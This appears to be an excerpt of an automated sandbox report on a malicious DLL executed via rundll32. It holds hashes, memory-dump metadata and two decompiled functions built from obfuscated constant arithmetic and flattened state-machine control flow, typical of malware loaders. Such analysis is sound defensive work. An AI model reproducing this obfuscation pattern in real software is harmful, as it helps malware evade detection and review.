                                                                                                                                  • Source File: 00000009.00000002.451308466.0000000010001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                  • Associated: 00000009.00000002.451301474.0000000010000000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                                  • Associated: 00000009.00000002.451436749.0000000010046000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                                  • Associated: 00000009.00000002.451468877.0000000010053000.00000004.00000001.01000000.0000000A.sdmp
                                                                                                                                  • Associated: 00000009.00000002.451479095.0000000010057000.00000004.00000001.01000000.0000000A.sdmp
                                                                                                                                  • Associated: 00000009.00000002.451519072.000000001005A000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_9_2_10000000_rundll32.jbxd
                                                                                                                                  Yara matches
                                                                                                                                  Similarity
                                                                                                                                  • API ID: H_prolog3
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID: 431132790-0
                                                                                                                                  • Opcode ID: bce61d6f58c59938f5edc3d8d30744f309a55dbd5b225535f57c780ac642b54b
                                                                                                                                  • Instruction ID: 700ec683b01abb9f9f773201453a4dcf188a8b347697539dbb350c7cd9cff270
                                                                                                                                  • Opcode Fuzzy Hash: bce61d6f58c59938f5edc3d8d30744f309a55dbd5b225535f57c780ac642b54b
                                                                                                                                  • Instruction Fuzzy Hash: D5F15E7460020ABFDB15EF54C890EAE7BE9EF08350F10852AF925AF291D734ED81DB61
                                                                                                                                  Uniqueness

                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                  C-Code - Quality: 97%
                                                                                                                                  			E002E044F() {
                                                                                                                                  				signed int _v4;
                                                                                                                                  				signed int _v8;
                                                                                                                                  				intOrPtr _v12;
                                                                                                                                  				intOrPtr _v16;
                                                                                                                                  				char _v20;
                                                                                                                                  				signed int _v24;
                                                                                                                                  				signed int _v28;
                                                                                                                                  				signed int _v32;
                                                                                                                                  				signed int _v36;
                                                                                                                                  				signed int _v40;
                                                                                                                                  				signed int _v44;
                                                                                                                                  				signed int _v48;
                                                                                                                                  				signed int _v52;
                                                                                                                                  				signed int _v56;
                                                                                                                                  				signed int _v60;
                                                                                                                                  				signed int _v64;
                                                                                                                                  				signed int _v68;
                                                                                                                                  				signed int _v72;
                                                                                                                                  				signed int _v76;
                                                                                                                                  				signed int _v80;
                                                                                                                                  				signed int _v84;
                                                                                                                                  				signed int _v88;
                                                                                                                                  				signed int _v92;
                                                                                                                                  				signed int _v96;
                                                                                                                                  				signed int _v100;
                                                                                                                                  				signed int _v104;
                                                                                                                                  				signed int _v108;
                                                                                                                                  				signed int _v112;
                                                                                                                                  				signed int _v116;
                                                                                                                                  				signed int _v120;
                                                                                                                                  				signed int _v124;
                                                                                                                                  				signed int _v128;
                                                                                                                                  				signed int _v132;
                                                                                                                                  				signed int _v136;
                                                                                                                                  				signed int _v140;
                                                                                                                                  				void* _t309;
                                                                                                                                  				intOrPtr _t310;
                                                                                                                                  				void* _t311;
                                                                                                                                  				intOrPtr _t321;
                                                                                                                                  				intOrPtr _t325;
                                                                                                                                  				void* _t329;
                                                                                                                                  				signed int _t331;
                                                                                                                                  				signed int _t332;
                                                                                                                                  				signed int _t333;
                                                                                                                                  				signed int _t334;
                                                                                                                                  				signed int _t335;
                                                                                                                                  				signed int _t336;
                                                                                                                                  				signed int _t337;
                                                                                                                                  				signed int _t338;
                                                                                                                                  				signed int _t339;
                                                                                                                                  				intOrPtr _t369;
                                                                                                                                  				void* _t373;
                                                                                                                                  				intOrPtr _t374;
                                                                                                                                  				void* _t379;
                                                                                                                                  				signed int* _t383;
                                                                                                                                  
                                                                                                                                  				_t383 =  &_v140;
                                                                                                                                  				_v16 = 0x8f0e94;
                                                                                                                                  				_v12 = 0x9bdfd3;
                                                                                                                                  				_t329 = 0;
                                                                                                                                  				_v8 = _v8 & 0;
                                                                                                                                  				_v4 = _v4 & 0;
                                                                                                                                  				_v68 = 0xf0a33d;
                                                                                                                                  				_v68 = _v68 ^ 0x64690d06;
                                                                                                                                  				_v68 = _v68 >> 7;
                                                                                                                                  				_v68 = _v68 ^ 0x00c9335c;
                                                                                                                                  				_v96 = 0x45a6c;
                                                                                                                                  				_v96 = _v96 + 0xffff2947;
                                                                                                                                  				_v96 = _v96 >> 0x10;
                                                                                                                                  				_v96 = _v96 ^ 0x00000003;
                                                                                                                                  				_v56 = 0xab09eb;
                                                                                                                                  				_v56 = _v56 | 0x7e070137;
                                                                                                                                  				_v56 = _v56 ^ 0x7eaf09ff;
                                                                                                                                  				_v80 = 0xa0f766;
                                                                                                                                  				_v80 = _v80 | 0xafeefcb7;
                                                                                                                                  				_v80 = _v80 ^ 0xafeefff7;
                                                                                                                                  				_v48 = 0xf26de0;
                                                                                                                                  				_v48 = _v48 + 0xffff1ff1;
                                                                                                                                  				_v48 = _v48 ^ 0x00f18dd1;
                                                                                                                                  				_v76 = 0x20d89d;
                                                                                                                                  				_v76 = _v76 + 0xffff51c8;
                                                                                                                                  				_v76 = _v76 | 0xd50d8457;
                                                                                                                                  				_v76 = _v76 ^ 0xd52cfd33;
                                                                                                                                  				_v136 = 0x1fce72;
                                                                                                                                  				_v136 = _v136 >> 0xe;
                                                                                                                                  				_v136 = _v136 | 0xd51e44d2;
                                                                                                                                  				_t331 = 7;
                                                                                                                                  				_v136 = _v136 / _t331;
                                                                                                                                  				_v136 = _v136 ^ 0x1e7b1fff;
                                                                                                                                  				_t379 = 0x1e2498b;
                                                                                                                                  				_v92 = 0x2fa0bb;
                                                                                                                                  				_v92 = _v92 >> 7;
                                                                                                                                  				_v92 = _v92 << 1;
                                                                                                                                  				_v92 = _v92 ^ 0x0000a534;
                                                                                                                                  				_v52 = 0x3913b;
                                                                                                                                  				_t332 = 0x4f;
                                                                                                                                  				_v52 = _v52 / _t332;
                                                                                                                                  				_v52 = _v52 ^ 0x00068b65;
                                                                                                                                  				_v104 = 0xfffd78;
                                                                                                                                  				_v104 = _v104 | 0x3b05e9e1;
                                                                                                                                  				_v104 = _v104 + 0x741e;
                                                                                                                                  				_v104 = _v104 ^ 0x7591a7da;
                                                                                                                                  				_v104 = _v104 ^ 0x4990882f;
                                                                                                                                  				_v84 = 0xe3d15a;
                                                                                                                                  				_v84 = _v84 << 8;
                                                                                                                                  				_v84 = _v84 ^ 0xbeb387df;
                                                                                                                                  				_v84 = _v84 ^ 0x5d62ae1e;
                                                                                                                                  				_v24 = 0xb3d42d;
                                                                                                                                  				_v24 = _v24 | 0x6ee5a57e;
                                                                                                                                  				_v24 = _v24 ^ 0x6efe8c67;
                                                                                                                                  				_v60 = 0x6708ad;
                                                                                                                                  				_v60 = _v60 + 0xd3fd;
                                                                                                                                  				_v60 = _v60 ^ 0x0061923e;
                                                                                                                                  				_v128 = 0x5551d4;
                                                                                                                                  				_t333 = 0x50;
                                                                                                                                  				_v128 = _v128 / _t333;
                                                                                                                                  				_t334 = 0x7a;
                                                                                                                                  				_v128 = _v128 / _t334;
                                                                                                                                  				_t335 = 0x7e;
                                                                                                                                  				_v128 = _v128 * 0x46;
                                                                                                                                  				_v128 = _v128 ^ 0x000c63e9;
                                                                                                                                  				_v28 = 0xd668f8;
                                                                                                                                  				_v28 = _v28 << 0x10;
                                                                                                                                  				_v28 = _v28 ^ 0x68f34519;
                                                                                                                                  				_v112 = 0x194a18;
                                                                                                                                  				_v112 = _v112 / _t335;
                                                                                                                                  				_v112 = _v112 | 0xa7c33fbe;
                                                                                                                                  				_t336 = 0x65;
                                                                                                                                  				_v112 = _v112 / _t336;
                                                                                                                                  				_v112 = _v112 ^ 0x01a285cf;
                                                                                                                                  				_v44 = 0xc79794;
                                                                                                                                  				_v44 = _v44 ^ 0x35aba003;
                                                                                                                                  				_v44 = _v44 ^ 0x356e5b19;
                                                                                                                                  				_v140 = 0x380362;
                                                                                                                                  				_t337 = 0x79;
                                                                                                                                  				_v140 = _v140 * 5;
                                                                                                                                  				_v140 = _v140 ^ 0x1d7b2daf;
                                                                                                                                  				_v140 = _v140 + 0x590f;
                                                                                                                                  				_v140 = _v140 ^ 0x1c6cd8ab;
                                                                                                                                  				_v120 = 0x1c8328;
                                                                                                                                  				_v120 = _v120 / _t337;
                                                                                                                                  				_t338 = 0xa;
                                                                                                                                  				_v120 = _v120 / _t338;
                                                                                                                                  				_v120 = _v120 | 0x9d020d0f;
                                                                                                                                  				_v120 = _v120 ^ 0x9d02076d;
                                                                                                                                  				_v124 = 0x55cbd6;
                                                                                                                                  				_v124 = _v124 >> 9;
                                                                                                                                  				_v124 = _v124 >> 0xc;
                                                                                                                                  				_v124 = _v124 >> 6;
                                                                                                                                  				_v124 = _v124 ^ 0x000fb83a;
                                                                                                                                  				_v132 = 0xf0ac8c;
                                                                                                                                  				_v132 = _v132 | 0x3804c269;
                                                                                                                                  				_v132 = _v132 >> 1;
                                                                                                                                  				_v132 = _v132 + 0xffff8da8;
                                                                                                                                  				_v132 = _v132 ^ 0x1c781e64;
                                                                                                                                  				_v88 = 0x7992e8;
                                                                                                                                  				_v88 = _v88 | 0xba3027fa;
                                                                                                                                  				_v88 = _v88 >> 9;
                                                                                                                                  				_v88 = _v88 ^ 0x0051fda0;
                                                                                                                                  				_v36 = 0x7aefbd;
                                                                                                                                  				_v36 = _v36 + 0xfffff4eb;
                                                                                                                                  				_v36 = _v36 ^ 0x0078a7fc;
                                                                                                                                  				_v40 = 0xf56b46;
                                                                                                                                  				_v40 = _v40 + 0xffff9ce0;
                                                                                                                                  				_v40 = _v40 ^ 0x00fe48d4;
                                                                                                                                  				_v108 = 0x27569f;
                                                                                                                                  				_v108 = _v108 + 0x2c0a;
                                                                                                                                  				_v108 = _v108 ^ 0xb442ac8c;
                                                                                                                                  				_v108 = _v108 ^ 0xdc856b2a;
                                                                                                                                  				_v108 = _v108 ^ 0x68e3c0da;
                                                                                                                                  				_v116 = 0xbcba21;
                                                                                                                                  				_v116 = _v116 << 0xd;
                                                                                                                                  				_v116 = _v116 << 8;
                                                                                                                                  				_v116 = _v116 >> 6;
                                                                                                                                  				_v116 = _v116 ^ 0x011b605a;
                                                                                                                                  				_v32 = 0x87c31e;
                                                                                                                                  				_v32 = _v32 ^ 0x05bc26b1;
                                                                                                                                  				_v32 = _v32 ^ 0x05363b16;
                                                                                                                                  				_v100 = 0x4be1cd;
                                                                                                                                  				_v100 = _v100 + 0xffff13dd;
                                                                                                                                  				_v100 = _v100 | 0xdbf19b4f;
                                                                                                                                  				_v100 = _v100 >> 7;
                                                                                                                                  				_v100 = _v100 ^ 0x01b90151;
                                                                                                                                  				_v64 = 0xb1223e;
                                                                                                                                  				_v64 = _v64 | 0xb1fef6fe;
                                                                                                                                  				_v64 = _v64 ^ 0xb1f65c82;
                                                                                                                                  				_v72 = 0x9ef2a7;
                                                                                                                                  				_v72 = _v72 * 0x66;
                                                                                                                                  				_v72 = _v72 + 0xffffefd1;
                                                                                                                                  				_v72 = _v72 ^ 0x3f51caaf;
                                                                                                                                  				while(1) {
                                                                                                                                  					L1:
                                                                                                                                  					while(1) {
                                                                                                                                  						_t309 = 0x546d98;
                                                                                                                                  						do {
                                                                                                                                  							L3:
                                                                                                                                  							if(_t379 == _t309) {
                                                                                                                                  								_t310 =  *0x2f3e00; // 0x0
                                                                                                                                  								_t339 = _v56;
                                                                                                                                  								_t311 = E002E0DD6(_t339, _v124, _v132, _v20,  *((intOrPtr*)(_t310 + 0x14)),  *((intOrPtr*)(_t310 + 0x10)), _v88, _v36);
                                                                                                                                  								_t383 =  &(_t383[6]);
                                                                                                                                  								__eflags = _t311 - _v80;
                                                                                                                                  								if(__eflags != 0) {
                                                                                                                                  									_t379 = 0x64eb485;
                                                                                                                                  									goto L14;
                                                                                                                                  								} else {
                                                                                                                                  									_t379 = 0xb6ab68a;
                                                                                                                                  									_t329 = 1;
                                                                                                                                  									goto L1;
                                                                                                                                  								}
                                                                                                                                  							} else {
                                                                                                                                  								if(_t379 == 0x19763e8) {
                                                                                                                                  									_push(_v128);
                                                                                                                                  									_push(_v60);
                                                                                                                                  									__eflags = E002D9462(E002EDCF7(_v24, 0x2d17f8, __eflags), _v112,  &_v20, 0, _v44, _v68) - _v96;
                                                                                                                                  									_t339 = _v140;
                                                                                                                                  									_t379 =  ==  ? 0x546d98 : 0x64eb485;
                                                                                                                                  									E002DA8B0(_t339, _t313, _v120);
                                                                                                                                  									_t383 =  &(_t383[8]);
                                                                                                                                  									L14:
                                                                                                                                  									_t369 =  *0x2f3e00; // 0x0
                                                                                                                                  									_t309 = 0x546d98;
                                                                                                                                  									goto L15;
                                                                                                                                  								} else {
                                                                                                                                  									if(_t379 == 0x1e2498b) {
                                                                                                                                  										_push(_t339);
                                                                                                                                  										_push(_t339);
                                                                                                                                  										_t373 = 0x28;
                                                                                                                                  										_t321 = E002D7FF2(_t373);
                                                                                                                                  										 *0x2f3e00 = _t321;
                                                                                                                                  										 *((intOrPtr*)(_t321 + 0x14)) = 0x4000;
                                                                                                                                  										_t374 =  *0x2f3e00; // 0x0
                                                                                                                                  										_t325 = E002D7FF2( *((intOrPtr*)(_t374 + 0x14)));
                                                                                                                                  										_t369 =  *0x2f3e00; // 0x0
                                                                                                                                  										_t379 = 0x19763e8;
                                                                                                                                  										_t339 =  *((intOrPtr*)(_t369 + 0x14)) + _t325;
                                                                                                                                  										 *((intOrPtr*)(_t369 + 0x10)) = _t325;
                                                                                                                                  										 *((intOrPtr*)(_t369 + 0x1c)) = _t325;
                                                                                                                                  										 *((intOrPtr*)(_t369 + 0x24)) = _t325;
                                                                                                                                  										 *(_t369 + 4) = _t339;
                                                                                                                                  										_t309 = 0x546d98;
                                                                                                                                  										continue;
                                                                                                                                  									} else {
                                                                                                                                  										if(_t379 == 0x64eb485) {
                                                                                                                                  											E002E8519(_v32, _v100,  *((intOrPtr*)(_t369 + 0x10)));
                                                                                                                                  											E002E8519(_v64, _v72,  *0x2f3e00);
                                                                                                                                  										} else {
                                                                                                                                  											if(_t379 != 0xb6ab68a) {
                                                                                                                                  												goto L15;
                                                                                                                                  											} else {
                                                                                                                                  												E002D957D(_v20, _v40, _v108, _v48, _v116);
                                                                                                                                  											}
                                                                                                                                  										}
                                                                                                                                  									}
                                                                                                                                  								}
                                                                                                                                  							}
                                                                                                                                  							L18:
                                                                                                                                  							return _t329;
                                                                                                                                  							L15:
                                                                                                                                  							__eflags = _t379 - 0xfde45c5;
                                                                                                                                  						} while (__eflags != 0);
                                                                                                                                  						goto L18;
                                                                                                                                  					}
                                                                                                                                  				}
                                                                                                                                  			}


























































                                                                                                                                  0x002e0851
                                                                                                                                  0x002e0859
                                                                                                                                  0x002e0859
                                                                                                                                  0x002e085f
                                                                                                                                  0x002e085f
                                                                                                                                  0x002e0864
                                                                                                                                  0x002e0864
                                                                                                                                  0x002e0866
                                                                                                                                  0x002e0985
                                                                                                                                  0x002e099f
                                                                                                                                  0x002e09a3
                                                                                                                                  0x002e09a8
                                                                                                                                  0x002e09ab
                                                                                                                                  0x002e09af
                                                                                                                                  0x002e09be
                                                                                                                                  0x00000000
                                                                                                                                  0x002e09b1
                                                                                                                                  0x002e09b3
                                                                                                                                  0x002e09b8
                                                                                                                                  0x00000000
                                                                                                                                  0x002e09b8
                                                                                                                                  0x002e086c
                                                                                                                                  0x002e0872
                                                                                                                                  0x002e091a
                                                                                                                                  0x002e0923
                                                                                                                                  0x002e0963
                                                                                                                                  0x002e0967
                                                                                                                                  0x002e0970
                                                                                                                                  0x002e0973
                                                                                                                                  0x002e0978
                                                                                                                                  0x002e09c0
                                                                                                                                  0x002e09c0
                                                                                                                                  0x002e09c6
                                                                                                                                  0x00000000
                                                                                                                                  0x002e0878
                                                                                                                                  0x002e087e
                                                                                                                                  0x002e08c7
                                                                                                                                  0x002e08c8
                                                                                                                                  0x002e08cb
                                                                                                                                  0x002e08cc
                                                                                                                                  0x002e08d1
                                                                                                                                  0x002e08d6
                                                                                                                                  0x002e08e9
                                                                                                                                  0x002e08f2
                                                                                                                                  0x002e08f7
                                                                                                                                  0x002e08fd
                                                                                                                                  0x002e0907
                                                                                                                                  0x002e0909
                                                                                                                                  0x002e090c
                                                                                                                                  0x002e090f
                                                                                                                                  0x002e0912
                                                                                                                                  0x002e085f
                                                                                                                                  0x00000000
                                                                                                                                  0x002e0880
                                                                                                                                  0x002e0882
                                                                                                                                  0x002e09e7
                                                                                                                                  0x002e09fa
                                                                                                                                  0x002e0888
                                                                                                                                  0x002e088e
                                                                                                                                  0x00000000
                                                                                                                                  0x002e0894
                                                                                                                                  0x002e08ae
                                                                                                                                  0x002e08b3
                                                                                                                                  0x002e088e
                                                                                                                                  0x002e0882
                                                                                                                                  0x002e087e
                                                                                                                                  0x002e0872
                                                                                                                                  0x002e0a04
                                                                                                                                  0x002e0a0d
                                                                                                                                  0x002e09cb
                                                                                                                                  0x002e09cb
                                                                                                                                  0x002e09cb
                                                                                                                                  0x00000000
                                                                                                                                  0x002e09d7
                                                                                                                                  0x002e085f

                                                                                                                                  Strings
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000009.00000002.451115709.00000000002D1000.00000020.00000800.00020000.00000000.sdmp, Offset: 002D0000, based on PE: true
                                                                                                                                  • Associated: 00000009.00000002.451090160.00000000002D0000.00000004.00000800.00020000.00000000.sdmp
                                                                                                                                  • Associated: 00000009.00000002.451178530.00000000002F3000.00000004.00000800.00020000.00000000.sdmp
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_9_2_2d0000_rundll32.jbxd
                                                                                                                                  Yara matches
                                                                                                                                  Similarity
                                                                                                                                  • API ID:
                                                                                                                                  • String ID: ,
                                                                                                                                  • API String ID: 0-2314114710
                                                                                                                                  • Opcode ID: 4b7f66143ac83b1a9ae5c8fa8fc4de0d8530a0894183ea665bf4f976631ebc33
                                                                                                                                  • Instruction ID: bc967c91353cec62aafdef1b4a62e25509a8ce13b116f983ebe2c1023ffe0237
                                                                                                                                  • Opcode Fuzzy Hash: 4b7f66143ac83b1a9ae5c8fa8fc4de0d8530a0894183ea665bf4f976631ebc33
                                                                                                                                  • Instruction Fuzzy Hash: BCE14F715183809FD368CF26D58A90BBBF2FBC4B58F60891DF59A86260C7B1C959CF42
                                                                                                                                  Uniqueness

                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                  APIs
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000009.00000002.451308466.0000000010001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                  • Associated: 00000009.00000002.451301474.0000000010000000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                                  • Associated: 00000009.00000002.451436749.0000000010046000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                                  • Associated: 00000009.00000002.451468877.0000000010053000.00000004.00000001.01000000.0000000A.sdmp
                                                                                                                                  • Associated: 00000009.00000002.451479095.0000000010057000.00000004.00000001.01000000.0000000A.sdmp
                                                                                                                                  • Associated: 00000009.00000002.451519072.000000001005A000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_9_2_10000000_rundll32.jbxd
                                                                                                                                  Yara matches
                                                                                                                                  Similarity
                                                                                                                                  • API ID: Iconic
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID: 110040809-0
                                                                                                                                  • Opcode ID: c62964fb237a153d00a9d951690d2dc04f1de6fa771c83c35e5bfac844c94462
                                                                                                                                  • Instruction ID: 838b9ee9edc54b62b4d2e1430c30368496747ad900502173d0e488298d75c8b4
                                                                                                                                  • Opcode Fuzzy Hash: c62964fb237a153d00a9d951690d2dc04f1de6fa771c83c35e5bfac844c94462
                                                                                                                                  • Instruction Fuzzy Hash: D6C012B0504208EB8704CB94D940C1977A8E74D30470002CCF80C83300D531AD008655
                                                                                                                                  Uniqueness

                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                  C-Code - Quality: 98%
                                                                                                                                  			E002E9EEC() {
                                                                                                                                  				intOrPtr _v8;
                                                                                                                                  				intOrPtr _v12;
                                                                                                                                  				char _v16;
                                                                                                                                  				char _v20;
                                                                                                                                  				char _v24;
                                                                                                                                  				char _v28;
                                                                                                                                  				signed int _v32;
                                                                                                                                  				signed int _v36;
                                                                                                                                  				signed int _v40;
                                                                                                                                  				signed int _v44;
                                                                                                                                  				signed int _v48;
                                                                                                                                  				signed int _v52;
                                                                                                                                  				signed int _v56;
                                                                                                                                  				signed int _v60;
                                                                                                                                  				signed int _v64;
                                                                                                                                  				signed int _v68;
                                                                                                                                  				signed int _v72;
                                                                                                                                  				signed int _v76;
                                                                                                                                  				signed int _v80;
                                                                                                                                  				signed int _v84;
                                                                                                                                  				signed int _v88;
                                                                                                                                  				signed int _v92;
                                                                                                                                  				signed int _v96;
                                                                                                                                  				signed int _t207;
                                                                                                                                  				intOrPtr _t209;
                                                                                                                                  				intOrPtr _t212;
                                                                                                                                  				intOrPtr _t214;
                                                                                                                                  				intOrPtr _t218;
                                                                                                                                  				void* _t219;
                                                                                                                                  				signed int _t221;
                                                                                                                                  				signed int _t222;
                                                                                                                                  				signed int _t223;
                                                                                                                                  				signed int _t224;
                                                                                                                                  				signed int _t225;
                                                                                                                                  				signed int _t257;
                                                                                                                                  				void* _t259;
                                                                                                                                  				char _t263;
                                                                                                                                  				void* _t264;
                                                                                                                                  				void* _t266;
                                                                                                                                  
                                                                                                                                  				_v64 = 0xd7ee0e;
                                                                                                                                  				_t257 = 0x22;
                                                                                                                                  				_v64 = _v64 / _t257;
                                                                                                                                  				_v64 = _v64 + 0x89a9;
                                                                                                                                  				_t219 = 0;
                                                                                                                                  				_v64 = _v64 ^ 0x0000b335;
                                                                                                                                  				_t259 = 0xb83ebc6;
                                                                                                                                  				_v96 = 0xf5dfb6;
                                                                                                                                  				_v96 = _v96 >> 6;
                                                                                                                                  				_t221 = 0x26;
                                                                                                                                  				_v96 = _v96 / _t221;
                                                                                                                                  				_t222 = 0x2d;
                                                                                                                                  				_v96 = _v96 * 0x58;
                                                                                                                                  				_v96 = _v96 ^ 0x000b9251;
                                                                                                                                  				_v60 = 0xd70e95;
                                                                                                                                  				_v60 = _v60 >> 9;
                                                                                                                                  				_v60 = _v60 + 0xffffe8b9;
                                                                                                                                  				_v60 = _v60 ^ 0x00062b78;
                                                                                                                                  				_v44 = 0xb641ac;
                                                                                                                                  				_v44 = _v44 / _t222;
                                                                                                                                  				_v44 = _v44 ^ 0x0002d028;
                                                                                                                                  				_v52 = 0xbf8457;
                                                                                                                                  				_t223 = 0x5d;
                                                                                                                                  				_v52 = _v52 / _t223;
                                                                                                                                  				_v52 = _v52 | 0xbb7661a2;
                                                                                                                                  				_v52 = _v52 ^ 0xbb710206;
                                                                                                                                  				_v80 = 0x47b11a;
                                                                                                                                  				_v80 = _v80 ^ 0xc2c4229c;
                                                                                                                                  				_t224 = 0x18;
                                                                                                                                  				_v80 = _v80 / _t224;
                                                                                                                                  				_v80 = _v80 + 0xffff1c96;
                                                                                                                                  				_v80 = _v80 ^ 0x08184a4c;
                                                                                                                                  				_v36 = 0x40dca8;
                                                                                                                                  				_v36 = _v36 + 0x3144;
                                                                                                                                  				_v36 = _v36 ^ 0x004d2780;
                                                                                                                                  				_v40 = 0xec5297;
                                                                                                                                  				_v40 = _v40 * 0x45;
                                                                                                                                  				_v40 = _v40 ^ 0x3fbac2f2;
                                                                                                                                  				_v72 = 0x18b121;
                                                                                                                                  				_v72 = _v72 >> 1;
                                                                                                                                  				_v72 = _v72 * 0x1e;
                                                                                                                                  				_v72 = _v72 + 0xfd79;
                                                                                                                                  				_v72 = _v72 ^ 0x0173ec5f;
                                                                                                                                  				_v76 = 0xd8cc67;
                                                                                                                                  				_v76 = _v76 >> 2;
                                                                                                                                  				_v76 = _v76 >> 0xd;
                                                                                                                                  				_v76 = _v76 * 0x23;
                                                                                                                                  				_v76 = _v76 ^ 0x000d42f3;
                                                                                                                                  				_v88 = 0x5f1bd9;
                                                                                                                                  				_v88 = _v88 + 0x89b3;
                                                                                                                                  				_v88 = _v88 ^ 0xee5f73f3;
                                                                                                                                  				_v88 = _v88 ^ 0xfa82a5ad;
                                                                                                                                  				_v88 = _v88 ^ 0x14801a76;
                                                                                                                                  				_v92 = 0x778c42;
                                                                                                                                  				_t225 = 0x6d;
                                                                                                                                  				_v92 = _v92 * 0x69;
                                                                                                                                  				_v92 = _v92 << 0xb;
                                                                                                                                  				_v92 = _v92 | 0xba472be1;
                                                                                                                                  				_v92 = _v92 ^ 0xfe7d7315;
                                                                                                                                  				_v56 = 0x5dd318;
                                                                                                                                  				_v56 = _v56 / _t257;
                                                                                                                                  				_v56 = _v56 << 0xc;
                                                                                                                                  				_v56 = _v56 ^ 0x2c2721c6;
                                                                                                                                  				_v84 = 0xd870dc;
                                                                                                                                  				_v84 = _v84 >> 0x10;
                                                                                                                                  				_v84 = _v84 | 0x1345b487;
                                                                                                                                  				_v84 = _v84 * 0x5a;
                                                                                                                                  				_v84 = _v84 ^ 0xc68bf031;
                                                                                                                                  				_v48 = 0x9a419e;
                                                                                                                                  				_v48 = _v48 | 0xfa3afde2;
                                                                                                                                  				_v48 = _v48 ^ 0xfabdbed6;
                                                                                                                                  				_v32 = 0x7a1ab;
                                                                                                                                  				_v32 = _v32 / _t225;
                                                                                                                                  				_v32 = _v32 ^ 0x000f5e95;
                                                                                                                                  				_v68 = 0x67bbab;
                                                                                                                                  				_v68 = _v68 + 0xffffccf8;
                                                                                                                                  				_v68 = _v68 ^ 0x5c1ded32;
                                                                                                                                  				_v68 = _v68 << 0xd;
                                                                                                                                  				_v68 = _v68 ^ 0x4cb92f41;
                                                                                                                                  				_t263 = _v28;
                                                                                                                                  				_t258 = _v28;
                                                                                                                                  				goto L1;
                                                                                                                                  				do {
                                                                                                                                  					while(1) {
                                                                                                                                  						L1:
                                                                                                                                  						_t266 = _t259 - 0xc23b37f;
                                                                                                                                  						if(_t266 > 0) {
                                                                                                                                  							break;
                                                                                                                                  						}
                                                                                                                                  						if(_t266 == 0) {
                                                                                                                                  							E002E8519(_v56, _v84, _v24);
                                                                                                                                  							_t259 = 0xdb1153f;
                                                                                                                                  							continue;
                                                                                                                                  						}
                                                                                                                                  						if(_t259 == 0xab8c2) {
                                                                                                                                  							_t209 =  *0x2f3e10; // 0x0
                                                                                                                                  							E002D8ECE(_v8 + 1, _t209 + 0x1c, _v12, _v92);
                                                                                                                                  							_t212 =  *0x2f3e10; // 0x0
                                                                                                                                  							_t234 = _v16;
                                                                                                                                  							_t264 = _t264 + 0xc;
                                                                                                                                  							_t219 = 1;
                                                                                                                                  							_t259 = 0xc23b37f;
                                                                                                                                  							 *((intOrPtr*)(_t212 + 0xc)) = _v16;
                                                                                                                                  							continue;
                                                                                                                                  						}
                                                                                                                                  						if(_t259 == 0x26dca52) {
                                                                                                                                  							_t234 = _v96;
                                                                                                                                  							_t214 = E002DA9CE(_v96, _t263,  &_v28, _v60, _v44);
                                                                                                                                  							_t258 = _t214;
                                                                                                                                  							_t264 = _t264 + 0xc;
                                                                                                                                  							if(_t214 == 0) {
                                                                                                                                  								goto L22;
                                                                                                                                  							}
                                                                                                                                  							_t259 = 0xe747a68;
                                                                                                                                  							continue;
                                                                                                                                  						}
                                                                                                                                  						if(_t259 == 0xa9b692f) {
                                                                                                                                  							_t263 = E002DF899(_t234);
                                                                                                                                  							_t259 = 0x26dca52;
                                                                                                                                  							continue;
                                                                                                                                  						}
                                                                                                                                  						if(_t259 != 0xb83ebc6) {
                                                                                                                                  							goto L21;
                                                                                                                                  						} else {
                                                                                                                                  							_t259 = 0xa9b692f;
                                                                                                                                  							continue;
                                                                                                                                  						}
                                                                                                                                  					}
                                                                                                                                  					if(_t259 == 0xdb1153f) {
                                                                                                                                  						E002D4E7D(_v48, _v32, _t258, _v68);
                                                                                                                                  						_t259 = 0xdb3b1d3;
                                                                                                                                  						goto L21;
                                                                                                                                  					}
                                                                                                                                  					if(_t259 == 0xe566670) {
                                                                                                                                  						_t207 = E002E894B( &_v16,  &_v24, _v36, _v40, _v72, _v76);
                                                                                                                                  						_t264 = _t264 + 0x10;
                                                                                                                                  						asm("sbb esi, esi");
                                                                                                                                  						_t259 = ( ~_t207 & 0xf3e70543) + 0xc23b37f;
                                                                                                                                  						goto L1;
                                                                                                                                  					}
                                                                                                                                  					if(_t259 != 0xe747a68) {
                                                                                                                                  						goto L21;
                                                                                                                                  					}
                                                                                                                                  					_t259 = 0xdb1153f;
                                                                                                                                  					if(_v28 > 2) {
                                                                                                                                  						_t218 = E002D4346( &_v20, _v52,  *((intOrPtr*)(_t258 + 8)), _v80);
                                                                                                                                  						_v24 = _t218;
                                                                                                                                  						_pop(_t234);
                                                                                                                                  						if(_t218 != 0) {
                                                                                                                                  							_t259 = 0xe566670;
                                                                                                                                  						}
                                                                                                                                  					}
                                                                                                                                  					goto L1;
                                                                                                                                  					L21:
                                                                                                                                  				} while (_t259 != 0xdb3b1d3);
                                                                                                                                  				L22:
                                                                                                                                  				return _t219;
                                                                                                                                  			}
                                                                                                                                  0x00000000
                                                                                                                                  0x00000000
                                                                                                                                  0x002ea1c6
                                                                                                                                  0x00000000
                                                                                                                                  0x002ea1c6
                                                                                                                                  0x002ea17a
                                                                                                                                  0x002ea198
                                                                                                                                  0x002ea19a
                                                                                                                                  0x00000000
                                                                                                                                  0x002ea19a
                                                                                                                                  0x002ea182
                                                                                                                                  0x00000000
                                                                                                                                  0x002ea188
                                                                                                                                  0x002ea188
                                                                                                                                  0x00000000
                                                                                                                                  0x002ea188
                                                                                                                                  0x002ea182
                                                                                                                                  0x002ea22c
